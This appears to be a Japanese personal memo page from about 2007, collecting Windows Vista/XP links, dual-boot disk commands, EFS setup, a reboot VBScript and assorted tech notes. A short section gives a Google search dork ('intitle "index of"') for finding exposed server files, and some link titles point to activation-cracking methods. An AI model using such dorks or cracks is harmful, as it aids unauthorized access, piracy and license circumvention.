生年月日から年齢を計算する簡単な計算式 http://nosa.cocolog-nifty.com/sanonosa/2007/06/post_1db2.html (今日の日付-誕生日)/10000の小数点以下切捨て。
VISTA  Windows Vista Upgrade Advisor 1.0  http://www.microsoft.com/downloads/details.aspx?FamilyID=42b5ac83-c24f-4863-a389-3ffc194924f8&DisplayLang=ja  Windows XP 用 Windows 転送ツール  http://www.microsoft.com/downloads/details.aspx?FamilyID=2b6f1631-973a-45c7-a4ec-4928fa173266&DisplayLang=ja  Windows Vista 用の更新プログラム (KB932246)  http://www.microsoft.com/downloads/details.aspx?FamilyID=e529eeaa-10f2-44fd-bae1-89f395e71277&DisplayLang=ja  Microsoft® Windows® Software Development Kit Update for Windows Vista™  http://www.microsoft.com/downloads/details.aspx?familyid=ff6467e6-5bba-4bf5-b562-9199be864d29&displaylang=en  Windows Vista にアップグレードしたいが経営層が 「Windows XP で十分だ」 という!  http://www.microsoft.com/japan/business/enterpriseready/interview/nayami03.mspx ◆「Windows Vista」のアクティベーションはほぼ永久に先送り可能  http://itpro.nikkeibp.co.jp/article/NEWS/20070322/265876/ ◆Windows Vistaのアクティベーションをクラックする新手法が登場  http://slashdot.jp/security/article.pl?sid=07/03/13/226247 ◆Vistaの正規プロダクト・キーを割り出すツールが登場  http://www.computerworld.jp/news/sec/59570.html ◆Vista OENハッキングでアクティベーション回避  http://www.itmedia.co.jp/news/articles/0704/13/news029.html    7にも・・・   「Windows 7」のアクティベーション回避法が発見される   http://www.computerworld.jp/topics/win7/167889.html ◆【ハウツー】紛失したWindows Vista/7のプロダクトキーを調べる方法 | 経営 | マイナビニュース  http://news.mynavi.jp/articles/2012/03/07/productkey/ ◆Vistaのハードウェア要件  http://www.atmarkit.co.jp/fwin2k/vista_feature/05hardware/05hardware_01.html ◆Windows Vista SP1には「SSLベースのVPN機能」が標準搭載  http://itpro.nikkeibp.co.jp/article/COLUMN/20070221/262745/ ◆Windows Vistaネットワーク完全ガイド  http://itpro.nikkeibp.co.jp/article/COLUMN/20070313/264787/   第1回 Vista時代の到来でネットワークは大きく変わる   http://itpro.nikkeibp.co.jp/article/COLUMN/20070314/264953/   第2回 ブロードバンド向けにTCP通信を強化   http://itpro.nikkeibp.co.jp/article/COLUMN/20070314/264966/   第3回 IPv6を前提に再設計NetBIOSなしでも動作する   http://itpro.nikkeibp.co.jp/article/COLUMN/20070314/264982/   第4回 管理者権限をOSで制限タスク・マネージャも改良   http://itpro.nikkeibp.co.jp/article/COLUMN/20070314/265013/  ・Vista では TCP/IP スタックが書き直され、その構造が大きく変わっています。   (デフォルトで IPv6 ですが特別、何かする必要は在りません)  ・Windows Firewall も出力 (outbound) 方向のフィルタリングをサポートしています。   (デフォルトでは オフになっているようで設定方法は調査中)  ・メールは Windows Mail となって スパムフィルタが実装されました。   Vista搭載の「Windows Mail」に脆弱性報告 http://www.itmedia.co.jp/news/articles/0703/26/news033.html   CRLF インジェクション っぽい。  ・Windows Defender が標準で組み込まれています。    Windows Defender    http://www.microsoft.com/downloads/details.aspx?FamilyID=435bfce7-da2b-4a6a-afa4-f7f14e605a0d&DisplayLang=ja   (だからと言ってアンチウイルス製品が不要と言う訳ではありません)  Windows Vistaのセキュリティ機能、XPとはここが違う   第1回:知らぬ間の不正プログラム侵入を防ぐユーザーアカウント制御   http://internet.watch.impress.co.jp/static/vista/security/2007/03/01/index.html   第2回:PC盗難による情報漏洩を防ぐドライブ暗号化機能   http://internet.watch.impress.co.jp/static/vista/security/2007/03/07/index.html    指定したユーザーでローカル/リモートでプロセスを実行するツールとして     PsExec v1.82     http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx     Windows管理者必携、Sysinternalsでシステムを把握する     http://www.atmarkit.co.jp/fsecurity/column/ueno/43.html ◆第7回 管理者権限での実行を制限するユーザー・アカウント制御UAC(前編)  1.管理者権限で利用するWindows OS  http://www.atmarkit.co.jp/fwin2k/vista_feature/07uac01/07uac01_01.html ◆Windows Vistaに対する恐怖は、どうすれば取り除けるのか?  http://www.nikkeibp.co.jp/news/it07q2/530175/ ◆Windows Vista体験ツアー(1)表示・操作編  http://pc.nikkeibp.co.jp/article/NPC/20070330/267023/  Windows Vista体験ツアー(2)設定編  http://pc.nikkeibp.co.jp/article/NPC/20070330/267025/ ◆IPv6を取り込んだVistaのネットワーク機能  http://www.atmarkit.co.jp/fwin2k/vista_feature/10ipv6/10ipv6_01.html ◆「Windows Vistaのような高機能OSは必要ない?」,インフォプラント調査  http://www.nikkeibp.co.jp/news/manu07q1/528814/ ◆Vista、個人での利用は0.9%、会社ではゼロ  http://japan.internet.com/research/20070307/1.html ◆Vistaから見るWeb2.0  http://www.itmedia.co.jp/enterprise/articles/0703/21/news012.html ◆【番外編】Vistaの快適度を「数値」で表示!  Windows エクスペリエンス インデックス26機種公開(週刊Vistaです!)  http://arena.nikkeibp.co.jp/col/20070315/121255/?from=mail ◆VistaとXPのデュアルブートでやってはいけないこと(週刊Vistaです!)  http://arena.nikkeibp.co.jp/col/20070319/121288/?from=mail ◆光と影が交錯? Vistaのネット環境  http://pc.nikkeibp.co.jp/article/NPC/20070313/264689/ ◆Vista PCと手持ちのAV機器・素材ですぐデキる!写真・音楽・ビデオ300%活用法(特集)  http://arena.nikkeibp.co.jp/tokushu/gen/20070215/120892/ ◆Vistaのロゴは頼りになるか?  http://pc.nikkeibp.co.jp/article/NPC/20070221/262753/ ◆僕がWindows Vistaを見送った理由(デジタルな旅)  http://arena.nikkeibp.co.jp/col/20070308/121159/ ◆Media Centerのライバルは「Wiiチャンネル」?(週刊Vistaです!)  http://arena.nikkeibp.co.jp/col/20070312/121202/ ◆キラーガジェット登場はアプリ業界を再編――事例で見るLiveガジェット  http://www.itmedia.co.jp/enterprise/articles/0703/08/news004.html ◆Vista時代のWindowsアプリ・デザイン・ツール  http://www.atmarkit.co.jp/fdotnet/special/blend01/blend01_01.html ◆ガジェットで新しい仕事環境を作る  http://pc.nikkeibp.co.jp/article/NPC/20070329/266889/ ◆「今どきのWebアプリは4時間で作られている」の理由  http://www.itmedia.co.jp/enterprise/articles/0703/30/news003.html ◆MSがVistaの検索機能の仕様変更を決断、年内にSP1のベータをリリース  http://pc.nikkeibp.co.jp/article/NEWS/20070621/275420/?ST=pc_news ◆Vista 使用者未だ1割に満たず〜自宅のパソコンに関する調査  http://japan.internet.com/research/20070619/1.html ◆「MCP教科書 Windows Vista(70-620)」  http://www.seshop.com/detail.asp?pid=7893 ◆Microsoftの新たな報告書,「Windows VistaはMac OS XやLinuxよりも安全」!?  http://itpro.nikkeibp.co.jp/article/NEWS/20070626/275939/ ◆セキュリティ強化を最大の“ウリ”にしたVistaの大誤算 Vista担当幹部、「セキュリティ機能の強化は、新OSへの移行理由にならなかった」とコメント  http://www.computerworld.jp/news/sec/88249.html ◆ビスタのメモリーは「2GB」が新標準?!  http://pc.nikkeibp.co.jp/article/NPC/20071121/287738/ ◆【これだけは知っておきたい,Vistaのセキュリティ機能】  第2回 ユーザーアカウント制御で危険な操作を防ぐ  http://itpro.nikkeibp.co.jp/article/COLUMN/20071126/287939/?ST=security ●XP と VISTA のデュアルブート環境の構築 ドライブが複数ある場合は、OS の入ってない違うドライブを選択すれば OK ですが ドライブが1台しか無い場合(ノート等)はそのままだと、デュアルブートを選べません が、未割り当て領域を確保する事で可能になります。 VISTA の DVD から起動したら、「コンピュータを修復」を選択します。 (システム回復コンソールみたいなもの) システム回復オプションガ起動したら、コマンドを起動し、次の手順を実行  X:\Sources>DISKPART DISKPART> LIST DISK 「LIST DISK」と入力   Disk ### Status Size Free   -------- ---------------- ------ -------  * Disk 0 オンライン 127 GB 0 GB   ハードディスクが1台しか無い場合は Disk 0 になります。   (実際の画面を確認してないので多少違うかも)  DISKPART> SELECT DISK 0 「SELECT DISK 番号」と入力して操作対象を選択 DISKPART> LIST PARTITION 「LIST PARTITION」と入力して番号を確認 Partition ### Type Size Offset ------------- ---------- ------ ------- * Partition 1 プライマリ 127 GB 32 KB   パーティションが1つしかない場合は Partition 1 になります。    DISKPART> SELECT PARTITION 1 「SELECT PARTITION 番号」と入力して操作対象を選択 パーティション 1 が選択されました。  DISKPART> SHRINK MINIMUM=60000 「SHRINK MINIMUM=縮小サイズ」と入力(単位は MB でこの場合は60GB)    ボリュームは、次の方法で正常に縮小されました: 59GB DISKPART> LIST DISK 「LIST DISK」と入力し、未割り当て(フリー)を確認   Disk ### Status Size Free   -------- ---------------- ------ -------  * Disk 0 オンライン 127 GB 59 GB    DISKPART> EXIT  DiskPart を終了しています...  X:\Sources>  再起動する事無く、この状態からセットアップを起動出来ます。  X:\Sources>D:\Setup.exe ●デュアルブートから VISTA を削除する手順 ・ブートセレクタを Windows XP用に復元する  C ドライブに XP がインストールされている場合はアプティブパーティションが  C ドライブになっているのでブートセレクタが NT ローダを先に見るように変更  ブートセクタを書き換えるには「BOOTSECT.EXE」コマンドを利用します。  (VISTA の DVD の中の「BOOT」フォルダ内に格納されています)  1.XP から起動  2.VISTA の DVD の BOOT フォルダに移動し、次のコマンドを実行      BOOTSECT /NT52 ALL    これで次回起動時からは Windowsブートローダは起動しなくなり    NT ローダで起動するようになります。    また C ドライブ内に残っている VISTA の ブートマネージャ関連    は削除してしまっても問題ありません。 ●デュアルブートから XP を削除する手順 ・ブートマネージャから「以前のバージョンのWindows」を消す  1.VISTA から 管理者として実行でコマンドプロンプトを表示  2.bcdedit /delete {ntldr} /f を実行  3.XP がインストールされたドライブから不要なファイルを削除  XP がインストールされている ドライブにある「Bootmgr」「Boot」を削除  すると、立ち上がらなくなってしまいますので、うっかりフォーマットして  しまった時の事を考えて、VISTA がインストールされているドライブへ移しておきます。   VISTA の DVD から起動し、「コンピュータを修復する」をクリックして   「システム回復オプション」を表示   コマンドプロンプトからボリュームの構成を確認   X:\Sources>DISKPART DISKPART> LIST VOLUME DISKPART> EXIT   XP が 第1パーティションにインストールされていた場合は そこが Cドライブになる   コマンドプロンプトから dir c:\boot でbootフォルダが在るか確認してコピー      xcopy c:\bootmgr d:\ /h mkdir d:\boot xcopy c:\boot d:\boot\ /cherky   VISTA がインストールされているパーティションをアクティブにして   XP が入っていたドライブをフォーマット  X:\Sources>DISKPART DISKPART> LIST DISK DISKPART> SELECT DISK 0 DISKPART> LIST PARTITION 2 DISKPART> ACTIVE DISKPART> SELECT PARTITION 1 DISKPART> FORMAT QUICK DISKPART> EXIT  XP が別の物理ドライブに入っている場合は、この手順は不要で  「format d: /f:ntfs /q」コマンドでフォーマットすれば OK です。   ※BIOS の設定でドライブ起動順をVISTA が先に来るように変更する ●VISTA に XP をぶち込んだ場合  Vista に限らず、Windows のデュアル/マルチブート環境を構築する際は  Windows のバージョンが古い物から順番にインストールするのが鉄則です。  この場合、VISTA は起動出来なくなります。  ブートセクタの復元方法  ブートセクタを書き換えるには「BOOTSECT.EXE」コマンドを利用します。  (VISTA の DVD の中の「BOOT」フォルダ内に格納されています)  1.XP から起動  2.VISTA の DVD の BOOT フォルダに移動し、次のコマンドを実行      BOOTSECT /NT60 ALL  3.Windows ブートマネージャに XP用のエントリを追加 bcdedit -create {ntldr} -d "Microsoft Windows XP"  bcdedit -set {ntldr} device partition=C: bcdedit -set {ntldr} path \ntldr           bcdedit -displayorder {ntldr} -addlast Windows Vista 用 Web サーバーの新機能 http://msdn.microsoft.com/msdnmag/issues/07/03/IIS7/default.aspx?loc=jp SATA または RAID の複数のディスクを持つコンピューターに Windows をインストールすると、SATA のチャネル番号を期待どおりにディスクのドライブ番号は一致していません http://support.microsoft.com/kb/937251
Windows7  Windows.old フォルダを使用して Windows 7 ベースのコンピュータを以前の Windows インストールに復元する方法  【特集】〜インストールから設定・活用まで〜 すべてが分かるWindows 7大百科  デル、Windows 7のマルチタッチに対応した21.5型ワイドフルHDディスプレイ  MS,「Windows 7」をUSBドライブからインストール可能にするツールを提供
暗号化機能を活用する。  フォルダのプロパティを開いて、詳細設定の属性の詳細で  「内容を暗号化してデータをセキュリティで保護する」  にチェックを入れると利用できる。    活用する為に、フォルダとファイルのショートカットメニューに追加する     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced   値の名前 : EncryptionContextMenu   値の型 : DWORD   値 : 1  エクスプローラ メニューに [暗号化の詳細] ボタンを追加   ファイル名.reg で以下を保存して実行   [HKEY_CLASSES_ROOT\*\Shell\Encrypt To User...\Command]   @="rundll32 efsadu.dll,AddUserToObject %1" 削除したユーザが暗号化したファイルの複合する。  回復エージェントを利用して予備の複合キーを持つユーザを用意しておく。   例) Administrator を回復エージェントに指定する場合     1.administrator でログイン     2.コマンドプロンプトから cipher /r:ファイル名 を実行       (ファイル名.cer と ファイル名.pfx が作成される)     3.gpedit.msc を実行し、グループポリシー管理コンソールを起動     4.[ローカルコンピュータポリシー]>[コンピュータの構成]>[Windowsの構成]>[Windowsの設定]>[セキュリティの設定]>[公開キーポリシー]を選択     5.「ファイルシステムの暗号化」から「データ回復エージェントの追加」を選択     6.ウイザードに従って、作成した「ファイル名.cer」ファイルを読み込む     ※作成した cer と pfx ファイルは転用されないように管理すること。 参考資料  EFS を使用したハード ドライブの暗号化でデータを保護する  http://www.microsoft.com/japan/smallbiz/sgc/articles/protect_data_efs.mspx  [HOWTO] Windows Server 2003 Enterprise Server で暗号化ファイル システムを管理する方法  http://support.microsoft.com/kb/324897
グーグル・ハッキング グーグルには、ファイルを探すコマンドがあるそうで検索窓に intile: をつけて検索すると、管理の甘いサーバが丸見えなんだとか。 「intitle index of」 で検索すると、そういう使い方をして漁っている人達の多い事。。。 メジャーな手口なんですね… 「intitle:"index of" .avi」で、動画ファイルとか検索できますがトラップの可能性もありそう。 (きんたまウイルスとかに感染するかも) こうやって盗んでいる人達も居るって事で。。。 GoogleをハッキングしてMP3をダウンロードする方法 http://gigazine.net/index.php?/news/comments/20081105_google_mp3_downloader/
JVN#86092776 BASP21 においてメールの不正送信が可能な脆弱性 http://jvn.jp/jp/JVN%2386092776/ Subject に CRLF インジェクションされる脆弱性が見つかったんだとか。 メールを送信した時のヘッダが  X-Mail-Agent: BSMTP DLL Mar 3 2007 by Tatsuo Baba になってない場合は、差し替えましょ。 ※ 差し替えて IIS6.0 の ASP でメールを送ろうとすると、不明なエラーが発生するっぽい…   ↑の修正はされたようですので入れ替えましょう。
メモリが "read" になることはできませんでした  メモリクリーナ常駐させると、なんだか安定…  えらいもんだ。  と思ったら出た。。。  で調べたら、ノートン先生が原因だった。  ウイルス定義ファイルの更新時に「dwhwizrd.exe のアプリケーションエラー・・・」が発生する  http://service1.symantec.com/support/INTER/entsecurityjapanesekb.nsf/jp_docid/pf/20020312150207949  効果ないので、システムログに イベントID26 が発生したら再起動するスプリクトで回避。 RebootEvent26.vbs '********************************************************************************* 'システムログにイベント ID 26 が発生した場合に再起動 '********************************************************************************* strComputer = "." Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate, (Security)}!\\" & strComputer & "\root\cimv2") Set colMonitoredEvents = objWMIService.ExecNotificationQuery("Select * from __instancecreationevent where TargetInstance isa 'Win32_NTLogEvent' and TargetInstance.EventCode='26'") Do Set objLatestEvent = colMonitoredEvents.NextEvent strAlertToSend = objLatestEvent.TargetInstance.User & " attempted to access DatabaseServer." reboot Loop '********************************************************************************* 'コンピュータの再起動は以下でも可能。 'shutdown.exe 'C:\Windows\Rundll32.exe Shell32.dll,SHExitWindowsEx 1 '********************************************************************************* sub reboot() Set objSystemSet = GetObject("winmgmts:{impersonationLevel=impersonate,(Shutdown)}").InstancesOf("Win32_OperatingSystem") For Each objSystem In objSystemSet objSystem.Win32Shutdown 2 Next end sub 中国ユーザーを激怒させたシマンテック「誤作動問題」の事後対応 http://it.nikkei.co.jp/internet/news/index.aspx?n=MMITbp000005062007Windows Server 2003 または Windows XP SP2 を実行しているコンピュータに修正プログラムをインストールした後に、 Symantec ウイルス がウイルスは検出できません。 http://support.microsoft.com/kb/933215 ノートン先生ヤブすぎ。。。 2007年 11月 22日 rev.22 以降のウイルス定義ファイルの更新に失敗する http://service1.symantec.com/support/inter/entsecurityjapanesekb.nsf/jp_docid/20071128121600949?OpenDocument&dtype=corp 11月21日から更新が止まってた… 普段見ないから気づきませんよ。 エンドポイントなんちゃらも、メモリーリーク起こしてダメぽ。 ウイルスバスター、マカフィにしても似たようなもんなんでしょうけどね。。。 いきなり新しい機能が実装されているような物には注意しましょうね。 PC 壊すリスクの方が高いですよ。 Windows Server 2003 ベースのコンピュータのエラー メッセージ:「STOP」 0x0000008E http://support.microsoft.com/kb/947479/ja Symantec ウイルス ソフトウェアがインストールされる Windows Server 2003ベースの コンピュータに停止エラー メッセージ:「 0x0000007f を停止する」 http://support.microsoft.com/kb/947471/ja あと、Endpoint Protection はアンインストールしてもレジストリにゴミが残って PC が重くなりますのでご注意を。 期限が切れたアンチウイルス製品並みに性質が悪い。(該当レジストリを削除すると直りましたが) マカフィやウイルスバスターも似たようなもんですけどね。 アンチウイルスソフトはレジストリのバックアップを取ってから、入れましょう。 アンインストールも、使う前に試しておいた方がいいかも。 Norton 削除ツール (Norton Removal Tool) を使う方法 http://service1.symantec.com/SUPPORT/INTER/tsgeninfojapanesekb.nsf/jp_docid/20050415150354953 VirusScanEnterpriseなどWindows インストーラサービスを利用している製品が正常にアンインストールできない場合の対処方法 http://www.mcafee.com/japan/pqa/aMcAfeeVse.asp?ancQno=VE07012901&ancProd=McAfeeVse コントロール パネルからアンインストールできない場合、Office 2003、Office 2007 または Office 2010 スイートをアンインストールする方法 http://support.microsoft.com/kb/290301 Windows インストーラが悪さしている・・・のか?
Winows Server 2003 SP2 の ASP でアップロード コードページの記述をしないと、文字化けするようになったっぽい。(IE7 との組み合わせ?) Shift-JIS <%@ Language=VBScript ENABLESESSIONSTATE=False CODEPAGE=932 LCID=1041 %> Response.CharSet = "Shift-JIS" そのうちこっちでまとめるよてい。 asp.html 単純に IE7 の問題っぽ。 リクエストに UTF8 を使うから、Shift-JIS 以外の文字が来た時に文字化けしてた感じかな。 UTF-8 で保存した HTML で Shift-JIS な XML を読み込むと VISTA 以外の IE は固まるんですけど・・・ へんなコードは書いてないんだけどなぁ、、、 UTF-8 な XML 読んでも固まった。orz ASP から XML ファイル作成してそれを返すとアウトっぽいような… Microsoft Internet Explorer unspecified denial of service http://xforce.iss.net/xforce/xfdb/33715 ↑ まさにこれ。。。
GPS 「百分率表記」と「度分秒表記」がある。 度分秒表記 ⇒ 百分率表記 は、[分]/60+[秒]/3600 度分表記 ⇒ 度分秒表記 は、小数点以下を 60 で掛ける。 .NET向けGISライブラリ「SharpMap」 ASP.NET でも Windows アプリケーションでも動作。
携帯でのネット、、、 普段 PC にメールを送って来ない友人が、携帯からメールを送ってきたんですけど その時、本文に名前とか書いてなくて誰だか不明で、返信メールに「誰?」って 返したら、すげー怒ってた… ケータイ文化圏とネット文化圏の深い溝 http://www.kotono8.com/2006/10/25mobile.html パソコン見放す20代「下流」携帯族 http://facta.co.jp/article/200703060.html パソコンを使わない「純血ケータイ族」 http://www.netadreport.com/blog/2007/04/blog-post_17.html 携帯電話のみのネットユーザーは低レベルじゃない http://japan.cnet.com/column/netad/story/0,3800075540,20350532,00.htm 携帯電話で人間に感染するウイルス発生? http://slashdot.jp/security/article.pl?sid=07/04/17/2245240 学校裏サイトで、今何が行われているのか〜子どもとケータイの闇 子どもとセキュリティ(4) http://www.nikkeibp.co.jp/sj/interview/83/index.html?cd=sjm 中学生とケータイ。 http://ameblo.jp/nippau/entry-10033006733.html ケータイだけでインターネットを利用するユーザーの実態調査(上)--「今後PCも利用したい」が55% http://japan.cnet.com/research/column/webreport/story/0,3800075674,20351511,00.htm ケータイWebはそろそろ危険 http://takagi-hiromitsu.jp/diary/20070624.html#p01 「プロフ」の何が問題か (1/3) http://plusd.itmedia.co.jp/lifestyle/articles/0810/15/news013.html PC と違う検索ユーザーの衝動的欲求 http://japan.internet.com/busnews/20070405/8.html ケータイ検索が“使えない”理由 http://www.itmedia.co.jp/anchordesk/articles/0704/25/news057.html 携帯電話の検索に関する調査--ユーザーは検索結果も“比較”している!? http://japan.cnet.com/research/column/webreport/story/0,3800075674,20346209,00.htm “検索”でケータイインタ−ネットが活発に http://japan.internet.com/wmnews/20070419/5.html ドコモ、デコメール利用動向を調査 http://k-tai.impress.co.jp/cda/article/news_toppage/34203.html 個人情報を流出させてしまうと…「一気に信頼低下&客足遠のく」- 英調査 http://journal.mycom.co.jp/news/2007/04/19/010/index.html ネット・オークションでの消費者の生活意識が浮き彫りに - ネット生活予測 http://journal.mycom.co.jp/news/2007/04/21/004/ ネット・オークション生活の拡大と、消費意識の新しいカタチが明らかに http://journal.mycom.co.jp/news/2007/04/20/028/ ポイントサイト利用者は6割、ポイントは「交換」より「換金」 http://internet.watch.impress.co.jp/cda/news/2007/04/19/15486.html 1台の携帯電話で2番号・2アドレス、48.3%が「利用したい」− アイシェア調べ http://itm-asp.com/cc/2261/BS568U7m 約半数が「他人の携帯機種が気になる」 http://www.j-cast.com/2007/06/15008450.html あおれば売れる? 携帯メールと通販の関係 http://www.itmedia.co.jp/anchordesk/articles/0706/11/news021.html 【編集長コラム「雑誌作りの舞台裏」】パソコンは「善」、ケータイは「悪」 http://pc.nikkeibp.co.jp/article/NPC/20070622/275544/ ケータイ業界に大変化、キャリアの収益モデル見直し求める--モバ研報告書 http://japan.cnet.com/news/com/story/0,2000056021,20351641,00.htm あなたのケータイやブログは大丈夫か――ネット時代の著作権考 (1/2) http://www.itmedia.co.jp/enterprise/articles/0706/27/news029.html ゲームの一画面は知財保護の対象になるのか? http://www.nikkeibp.co.jp/news/it07q2/531936/ 年代に関わらず、実は平均5割が「携帯でネット」派 http://business.nikkeibp.co.jp/article/manage/20071010/137308/ ケータイユーザーの“本音” http://k-tai.impress.co.jp/cda/article/interview/42297.html 【溶けゆく日本人】快適の代償(1) 待てない人々 数分間でイライラ http://sankei.jp.msn.com/life/lifestyle/071113/sty0711130811000-n1.htm 「便利になるとストレスが上昇する」という不思議なジレンマ http://satoshi.blogs.com/life/2007/11/blackberry.html 超便利! ビジネスに役立つ無料ツール:公開画像のExif情報にご注意!「JPEG Cleaner」と「JpegAnalyzer Plus」 http://internet.watch.impress.co.jp/cda/biz_tool/2008/06/17/19953.html 市場規模は1兆円台に! 〜拡大し続けるモバイルコンテンツ市場〜 http://japan.cnet.com/mobile/story/0,3800078151,20379756,00.htm [Gamefest 08#02]ダウンロードコンテンツで儲けるには? アイマス開発者が語るダウンロード販売成功の秘訣 http://www.4gamer.net/games/052/G005257/20080904039/  どこかのゲーム機で X68000 の名作を遊べるようにしてくれませんかね・・・ 平成生まれ中学生のケータイの使い方 http://www.nikkeibp.co.jp/article/news/20081030/108638/ 携帯サイト利用時に偽の個人情報を登録する人が43% http://www.nikkeibp.co.jp/article/column/20081215/119705/ セキュリティキーワード2009~モバイルサイト | LAC http://www.lac.co.jp/special/keyword2009/endo.html
2007年5月のパッチ適用後 File Server for Macintosh サービスが起動しなくなった… MS07-029 がくさい。 NetBIOS サービス 無効 NetBEUI サービス 無効 NetBIOS over TCP/IP 有効 に設定後、 File Server for Macintosh サービスを手動で起動したら開始された。 ソース: MacFile イベント ID: 10001 ソース: MacFile イベント ID: 10027 ソース: MacFile イベント ID: 10021 ソース: Service Control Manager イベント ID: 7024 管理用共有が見つからない場合に発生する問題の概要 http://support.microsoft.com/kb/842715
Microsoft Windows Server 2003 サポートページ うむぅ… -------------------------------------------- イベントの種類: エラー イベント ソース: Service Control Manager イベント カテゴリ: なし イベント ID: 7009 説明: SQL Server Agent (MSSQLSERVER) サービスへの接続中にタイムアウト (30000 ミリ秒) になりました。 -------------------------------------------- イベントの種類: エラー イベント ソース: Service Control Manager イベント カテゴリ: なし イベント ID: 7000 説明: SQL Server Agent (MSSQLSERVER) サービスは次のエラーのため開始できませんでした: そのサービスは指定時間内に開始要求または制御要求に応答しませんでした。 -------------------------------------------- イベントの種類: 警告 イベント ソース: NETLOGON イベント カテゴリ: なし イベント ID: 5804 説明: Netlogon Parameters レジストリ キーに含まれている、パラメータ 'MaximumPasswordAge' の値 0x0 は無効です。 このパラメータの最小値は 0x1 で、最大値は 0xf4240 です。 0x1 の値がこのパラメータに割り当てられています。 -------------------------------------------- イベントの種類: エラー イベント ソース: Schannel イベント カテゴリ: なし イベント ID: 36882 説明: リモート サーバーから受信した証明書は、信頼されていない証明機関によって発行されています。 このため、この証明書に含まれているデータはどれも検証できません。 SSL 接続の要求に失敗しました。添付されたデータにサーバー証明書が含まれています。  Windows XP で、Microsoft LDAP API を使用して SSL 接続経由で LDAP サーバーに接続できない  http://support.microsoft.com/kb/835208/ja --------------------------------------------
MusicID 便利になったもんですね・・・ MusicIDでタグ情報の取得 http://homepage3.nifty.com/nanahoshi/analog/qmp/qmp.html
セカンドライフ 地球シミュレーターでスマトラ沖の津波の映像出ていましたけど  あれをセカンドライフの仮想都市作で震災シミュレーションの  アトラクションとして作る事が出来ればウケそうだと思うけど。  これ読んでる技術者の人作って(笑)  競争相手が少なそうな PS3 でもいいから。 SecondLifeの仮想通貨流通量、2008年に1.25兆円--総加入者は2億5000万人に http://japan.cnet.com/news/media/story/0,2000056023,20349764,00.htm RMTビジネスの法的問題について http://itpro.nikkeibp.co.jp/article/Watcher/20070518/271542/
Windows のコードページ取得と変更 確認 コマンドプロンプトで c:\>chcp 現在のコード ページ: 932 UTF-8 に変更 c:\>chcp 65001  Code Page Identifiers  http://msdn2.microsoft.com/en-us/library/ms776446.aspx http://msdn.microsoft.com/en-us/library/dd317756.aspx ※コマンドプロンプト内だけ有効っぽい。  Shift-JIS から UFT-8 に変換する程度しか使い道なし?   c:\>chcp 65001   c:\>type index.html > index2.html ちなみに、EN-US の場合は、us と打てば変わる。 AppLocale Utility http://www.microsoft.com/downloads/details.aspx?FamilyID=8c4e8e0d-45d1-4d9b-b7c0-8430c1ac89ab&DisplayLang=ja Windows XP や Windows Server 2003 で Unicode 非対応の 他言語のアプリケーションを動作させるためのツール。 LCID を スプリクトで確認するには GetLocale/SetLocale を利用する。 コード ページ http://msdn.microsoft.com/library/ja/vclib/html/_crt_code_pages.asp Wscript.Echo GetLocale SetLocale("en-au") Wscript.Echo GetLocale Wscript.Echo FormatDateTime(Now(),vbLongDate) こんなかんじ。 地域のオプションで、該当する言語表示が有効になっていないと多分使えない。
IE7 のフィードを活用する。 http://www.microsoft.com/japan/rss/ 取りあえず、フィードカテゴリからサポートを選択。 「このフィードを購読する」で、、、 Windows RSS プラットフォームの紹介 http://www.microsoft.com/japan/msdn/ie/ie7/msfeeds_ovw.aspx Webサイトをトラッキングする簡単なスクリプト http://www.itmedia.co.jp/enterprise/articles/0706/20/news010.html IE だとブックマークのプロパティに「オフラインで使用する」ってのがあります。 これは、更新された場合にメールで通知する機能もありますよね。
Windows 2003 Server SP2 でアプリケーションの削除が出来ない… アプリのバグかと思ったら...  Windows Server 2003 SP2 に、コントロール パネルの「アプリケーションの追加と削除」項目の Service Pack の「削除」ボタンは使用できません。  http://support.microsoft.com/kb/937996
セーフモード環境で Windows インストーラアプリケーション(*.msi)を追加したり削除したりする場合の手順  セーフモードでは、MSIServer サービスが開始されないので  (サービスからの開始は禁止されていますので機能しません)  可能にするにはレジストリキーに追加します。   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal   値の名前: MSIServer   値 : Service   XP 以降の場合は REG.exe コマンドを利用して追加可能。   REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MSIServer /ve /d Service
TVersity http://tversity.com/home/ WMV や DIVX を PS3 で再生できるようになる。 Windows Srever 2003 にインストール可能。 詳しくは検索エンジンで。。。  自宅PCをメディアサーバー化して外出先からストリーミング再生できる「Orb」  http://www.forest.impress.co.jp/article/2007/06/25/orb.html  Media Centerで録画した番組も自動変換、新しいImage Converter 3が登場  http://journal.mycom.co.jp/news/2007/06/22/020/   Windows7 を使って PS3 や XBOX360 で再生させる動画を作るには 24fps 2PASS でOK。(TMPEGEnc4.0 XPress で確認) 30fps までならいけるかも。
ポイントマジック  ポイントは絶対儲かる金の卵。囲い込みだけじゃない大人の事情  http://web-tan.forum.impressrd.jp/e/2007/06/28/1542  例えば、20万円の TV を購入して 20% ポイントが付くと 4万円 ですけど  元々 16万円で買える商品だとすると、この商品をポイントで購入したばあい  ポイント購入にポイントは付きませんので 20万円分のポイントを使って購入  することになり事実上、4万円損した事に。。。  安く買ったつもりでもポイントを消費した時点でお得感は無くなり、、、  店側は、ポイントで利益を上げている訳ですね。  すごい儲かるらしく、商品の値段を下げずにポイントを使って  安く見せかけるオトナの理由も含まれているのかもしれません。 ポイントカード制による会計処理の裏側 http://okamot.com/mt/archives/2004/07/post-309.html 第38回 企業を痛めつけるポイントカード http://itpro.nikkeibp.co.jp/article/COLUMN/20100803/350956/
